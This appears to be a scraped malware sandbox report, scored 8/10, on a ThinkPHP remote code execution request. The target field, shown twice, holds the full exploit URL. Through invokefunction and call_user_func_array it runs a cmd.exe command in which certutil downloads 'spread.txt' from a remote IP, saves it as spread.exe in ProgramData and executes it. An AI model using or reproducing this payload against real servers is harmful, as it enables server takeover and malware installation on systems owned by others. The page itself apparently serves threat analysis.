General
-
Target
http://63.157.240.234:80/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars0=system&vars1[]=cmd.exe /c certutil -urlcache -split -f http://1.189.76.126:19490/spread.txt C:\ProgramData\spread.exe && C:\ProgramData\spread.exe
-
Sample
231106-ymtfpaea6t
Score
8/10
Malware Config
Targets
-
-
Target
http://63.157.240.234:80/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars0=system&vars1[]=cmd.exe /c certutil -urlcache -split -f http://1.189.76.126:19490/spread.txt C:\ProgramData\spread.exe && C:\ProgramData\spread.exe
Score8/10-
Downloads MZ/PE file
-